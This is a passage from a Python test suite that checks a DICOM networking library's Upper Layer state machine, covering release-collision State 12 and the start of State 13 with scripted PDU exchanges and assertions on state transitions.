# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
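# Sta12 (acceptor side of the collision): reached from Sta10 once the remote's
# A-RELEASE-RP PDU arrives (Evt13 -> AR-10); the DUL then waits for the local
# user's A-RELEASE (rsp) primitive, which AR-4 answers with an A-RELEASE-RP
# PDU and a running ARTIM timer. Descriptive summary only.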
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
        # Sta12 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
        # Sta12 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt3'
]
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rj),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
